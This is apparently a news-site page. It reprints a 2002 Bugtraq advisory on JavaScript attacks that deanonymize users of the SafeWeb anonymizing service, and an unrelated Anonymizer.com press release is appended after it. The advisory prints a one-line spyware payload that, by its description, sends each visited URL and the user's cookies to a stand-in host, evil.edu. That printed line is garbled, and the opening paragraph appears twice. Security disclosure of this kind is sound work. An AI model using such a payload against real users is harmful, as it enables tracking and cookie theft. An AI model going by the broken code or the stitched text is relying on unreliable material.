Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit).

Date: Mon, 11 Feb 2002 21:13:27 -0500
From: David Martin
To: bugtraq@
Subject: Deanonymizing SafeWeb Users

Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". SafeWeb licensed their technology to PrivaSec, who is currently running the technology in a preview program for a planned subscription service. They also licensed it to the CIA.

Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit).

An example (really one long line):

self['window']['top'].frames[0]['cookie_munch'] = Function('i=new Image(1,1);i.s'+'rc=" cation"].URL_text.value+(new Date()).getTime()+document.cookie;');

This is spyware. Any Web page containing this JavaScript makes the SafeWeb browser silently report every URL visited to the attacker at evil.edu, along with a copy of all of the persistent cookies previously established through SafeWeb. It works regardless of the user's security settings (recommended vs paranoid mode, etc.)
This attack is the only one we describe that depends on the browser: it works in Netscape 6.x and probably previous versions, but not IE. We have an attack that does basically the same thing and works in IE too, but it's a bit longer. Since our attacks are just JavaScript, they probably don't depend on the OS of the victim.

Basically, using the SafeWeb privacy service helps keep user identities out of routinely gathered log files, but it creates serious new risks for anyone an adversary might bother to actually target. You have to wonder whether this is a good tradeoff. After all, in the absence of serious bugs, Web browsers generally prevent Web sites from silently depositing spyware or snarfing all of the user's cookies. One thing is clear: most users in the intended market for this system had no idea that this system brought any risks with it.

For the full report (23 pages, PDF):

We've been in touch with SafeWeb since October, and with PrivaSec for about a month now. Some related problems in SafeWeb involving JavaScript spilling IP addresses have been noted here (by Alexander Yezhov) and in alt.privacy.anon-server (by Paul Rubin). Our paper adds spyware, cookie snarfing, and the essential equivalence between SafeWeb's "paranoid" and "recommended" modes of operation to the list of problems with SafeWeb's technology.

David Martin
Andrew Schulman

LinuxSecurity.com Team
Regina Purcell sent in a timely press release about the availability of their Anonymizer service. "Anonymizer.com today announced that more than 1 billion Web page views have been protected with the company's Anonymous Surfing service since its launch in 1996. The milestone highlights Anonymizer.com's ongoing success in the Internet Privacy and Security field, where it has operated profitably since 2000."

Anonymizer.com Celebrates "1 Billion Pages Protected" Milestone
Company's Success Validates Consumer Privacy Business Model

Anonymizer.com today announced that more than 1 billion Web page views have been protected with the company's Anonymous Surfing service since its launch in 1996. The milestone highlights Anonymizer.com's ongoing success in the Internet Privacy and Security field, where it has operated profitably since 2000.

Anonymizer.com CEO Bill Unrue attributes the company's success to its loyal user base and sound business practices. "Anonymizer.com has taken leading technology and built it into a simple, robust consumer product," he said. "By staying tuned to our customers' needs, we have developed the products and business strategies that have been the backbone of our success."

New developments at Anonymizer.com set to roll out before the end of 2001 include a major upgrade of the popular Anonymizer Privacy Button, improved speed and functionality on the Anonymous Surfing service, and the launch of a complementary Web site, OnlinePrivacyStore.com, that offers an array of privacy and security solutions.

About Anonymizer.com
Anonymizer.com, founded in 1997, is a privately held company headquartered in San Diego, Calif.
Anonymizer.com offers a complete range of free and premium services for the privacy and security needs of consumers and enterprises. Visit https://ntrepidcorp.com.